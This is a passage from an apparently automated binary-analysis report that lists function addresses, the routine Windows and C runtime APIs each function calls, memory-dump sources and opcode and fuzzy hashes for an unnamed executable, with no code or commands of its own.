                                                                                                                                                                          • Opcode ID: 198a9ddb3082e3af69048cf82972ed5dcae9f948115619dd1283bb6eeeecde4b
                                                                                                                                                                          • Instruction ID: c1722350a3a9fbccd699a00a09a6f05f29608401abc5583958f0f82b789258a0
                                                                                                                                                                          • Opcode Fuzzy Hash: 198a9ddb3082e3af69048cf82972ed5dcae9f948115619dd1283bb6eeeecde4b
                                                                                                                                                                          • Instruction Fuzzy Hash: EA313DB1D04208DBDF10DF91C945AEF7BB8EF49315F20402FE845A7241E778AA45CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E4C9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041E4D3
                                                                                                                                                                          • CreateDialogIndirectParamW.USER32 ref: 0041E5CC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDialogH_prolog3_IndirectParam
                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                          • API String ID: 2249790658-3580928618
                                                                                                                                                                          • Opcode ID: fd228375a09622bb7ab957ad083e07b8196dc3d2e1df579ed2d727cc6fbf33ed
                                                                                                                                                                          • Instruction ID: 2722335d969594bfc3da91b52e8ad700b17a09586fd0e7aa061ef77ad377980d
                                                                                                                                                                          • Opcode Fuzzy Hash: fd228375a09622bb7ab957ad083e07b8196dc3d2e1df579ed2d727cc6fbf33ed
                                                                                                                                                                          • Instruction Fuzzy Hash: BA318D30900218EBDB20DFA5C945BDDBBB5BF14308F10009EF845A7292EB799E84CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040F88B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040F892
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                                                                          • String ID: HsG$\
                                                                                                                                                                          • API String ID: 3339191932-835423451
                                                                                                                                                                          • Opcode ID: 9fc8f4b8ae0106a6cdd84a157156adafe8898d96288d521826e87ced1c8b384c
                                                                                                                                                                          • Instruction ID: 740425d03abf061617fe193d66f859ce0cc392466863bbfbf0cc7e0d40bce94f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9fc8f4b8ae0106a6cdd84a157156adafe8898d96288d521826e87ced1c8b384c
                                                                                                                                                                          • Instruction Fuzzy Hash: 27316371900118EADB25EBA1CC56BEEB778BF45308F14413EE502B71C2DB785A0ACF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045C556, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0045C55D
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString$H_prolog3H_prolog3_
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2488494826-815662401
                                                                                                                                                                          • Opcode ID: dfae44f96f843d10355139c92cd0617dd2b53f1047f9e39fe6dc0a7cd94907dc
                                                                                                                                                                          • Instruction ID: 1aa85f8db00f87f3fc68def251aa0362709492a6ca7c5d8c551d9026acc1a480
                                                                                                                                                                          • Opcode Fuzzy Hash: dfae44f96f843d10355139c92cd0617dd2b53f1047f9e39fe6dc0a7cd94907dc
                                                                                                                                                                          • Instruction Fuzzy Hash: AF313F71500208EBCB14EFA5C896BDDBB74BF14308F50812EFD1567291DB786A49CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00417823, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041782D
                                                                                                                                                                          • DialogBoxIndirectParamW.USER32 ref: 0041791B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DialogH_prolog3_IndirectParam
                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                          • API String ID: 1500191164-3580928618
                                                                                                                                                                          • Opcode ID: 3eaf27bf9840fc810a34843af5c82f72256ed9753f0bbcb3f9c0fcec4cf0e9f2
                                                                                                                                                                          • Instruction ID: 98040bdc5672f711545b7cbeb33f8ab8bb1a013a0bc757bd1b330844b4cc0404
                                                                                                                                                                          • Opcode Fuzzy Hash: 3eaf27bf9840fc810a34843af5c82f72256ed9753f0bbcb3f9c0fcec4cf0e9f2
                                                                                                                                                                          • Instruction Fuzzy Hash: E6314C30900218EBDB10EBA4C945AEDBBB4BF15308F14409EF845A7292DB799E55DBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004470B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: DrD$h6D
                                                                                                                                                                          • API String ID: 0-1468557914
                                                                                                                                                                          • Opcode ID: 625b7c75405e260125a4c4236df395d92c6e5a40127ed3a7ac881ca71b4c12bb
                                                                                                                                                                          • Instruction ID: 34a74892759146525e80f8df49c8b18b9b1fe8cc633a64d69a4d62df9abd21b7
                                                                                                                                                                          • Opcode Fuzzy Hash: 625b7c75405e260125a4c4236df395d92c6e5a40127ed3a7ac881ca71b4c12bb
                                                                                                                                                                          • Instruction Fuzzy Hash: DA41B674E04109EFDB04CF98C980AAEB7B2BF49304F248699D415A7345D338AE82DF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043567B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00435685
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0042DC56: __EH_prolog3_GS.LIBCMT ref: 0042DC5D
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1274762985-815662401
                                                                                                                                                                          • Opcode ID: 513658718dd9a9e50e3d90ac1006468cf3cbd815c08680c7a3229fdfe3ad6605
                                                                                                                                                                          • Instruction ID: d4a13f21c85cc622506b4129667b7de6f85281898ff0bfcf78b9f6181efbfc0e
                                                                                                                                                                          • Opcode Fuzzy Hash: 513658718dd9a9e50e3d90ac1006468cf3cbd815c08680c7a3229fdfe3ad6605
                                                                                                                                                                          • Instruction Fuzzy Hash: 31318D70A01258EEDB10DBA5C9957EDBBB4BF44308F1441AEE445BB2D2DBB80A49CB45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004357B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004357BD
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0042DCAF: __EH_prolog3_GS.LIBCMT ref: 0042DCB6
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1274762985-815662401
                                                                                                                                                                          • Opcode ID: d540d5239a71c06c17a7682f0b0b2e5c022d0fcec809778e458d65c1bb45dd78
                                                                                                                                                                          • Instruction ID: b18eeb6eff6bb09ab515d581b36b9efcae192a67177666e89873a7fab0948a98
                                                                                                                                                                          • Opcode Fuzzy Hash: d540d5239a71c06c17a7682f0b0b2e5c022d0fcec809778e458d65c1bb45dd78
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F31AD70A01218DEDB14EFA5C8967EDBBB4BF44308F1441AEE145BB2C2DBB80A48CB45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00405A50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memmove.LIBCMT ref: 00405AAC
                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00405AB8
                                                                                                                                                                            • Part of subcall function 00406350: SysAllocStringLen.OLEAUT32(00000000,?), ref: 00406399
                                                                                                                                                                            • Part of subcall function 00406350: _memmove.LIBCMT ref: 004063C1
                                                                                                                                                                            • Part of subcall function 00406350: SysFreeString.OLEAUT32(00000000), ref: 004063D1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free_memmove$Alloc
                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                          • API String ID: 2303858246-2556327735
                                                                                                                                                                          • Opcode ID: 2c478c14ea5671a8c4155613bb0815e900c509e382b7c722f19af52954580e1c
                                                                                                                                                                          • Instruction ID: 693b052fdcc1cb0660b86f90fc69e2465c4c1cba2427f17c156f9c08d958695e
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c478c14ea5671a8c4155613bb0815e900c509e382b7c722f19af52954580e1c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C11A532310A045BD720DEA9D8C056B73A5EF953207154F3FE446D7691D774A4448F69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00435A2C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00435A36
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0042DD09: __EH_prolog3_GS.LIBCMT ref: 0042DD10
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 1274762985-815662401
                                                                                                                                                                          • Opcode ID: 73a2cdc810c9c9d0e40048618b6d38cf06eda21531e67a52cb517ffd5c8b7c89
                                                                                                                                                                          • Instruction ID: 1e1bf02aff6c00e394f86cd886b5205e8f0e302a78459afd56c0f5ef2332dcfe
                                                                                                                                                                          • Opcode Fuzzy Hash: 73a2cdc810c9c9d0e40048618b6d38cf06eda21531e67a52cb517ffd5c8b7c89
                                                                                                                                                                          • Instruction Fuzzy Hash: E431AD70A11218DEDB10EFA4CC967EDBBB4BF44308F1441AEE145BB2C2DBB80A48CB45
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040F99A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040F9A4
                                                                                                                                                                            • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last$H_prolog3
                                                                                                                                                                          • String ID: .$HsG
                                                                                                                                                                          • API String ID: 3076002782-94403695
                                                                                                                                                                          • Opcode ID: 67b0ac12c4f6e497218e698a1a375313158aab7e45fc50fccce1ebf59d68448a
                                                                                                                                                                          • Instruction ID: 62f9a770455c611863b0c6d5dac8ad3e8e98337f71e175249b05daed301917a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 67b0ac12c4f6e497218e698a1a375313158aab7e45fc50fccce1ebf59d68448a
                                                                                                                                                                          • Instruction Fuzzy Hash: A6318071904258EEDB21DBA5CC84BDEBB74AB11304F1441AEE049771D1DBB80B89CB56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440882, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0044088C
                                                                                                                                                                            • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: %d: %s$HsG
                                                                                                                                                                          • API String ID: 2427045233-3298890478
                                                                                                                                                                          • Opcode ID: 7eb31b6c0c8dd77c1e88ff9c4f45aa66cce80a141947fbcb3306adb5ba55ec68
                                                                                                                                                                          • Instruction ID: ab0cda26f9016c1479564a557ea5def889c037ebfc3c1312b48c79c89f1616f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 7eb31b6c0c8dd77c1e88ff9c4f45aa66cce80a141947fbcb3306adb5ba55ec68
                                                                                                                                                                          • Instruction Fuzzy Hash: 19316B71E00208EFDB14EBA4CC55BDDB7B4AF55304F5084AEF501B71A2EB789A48CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004286EB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
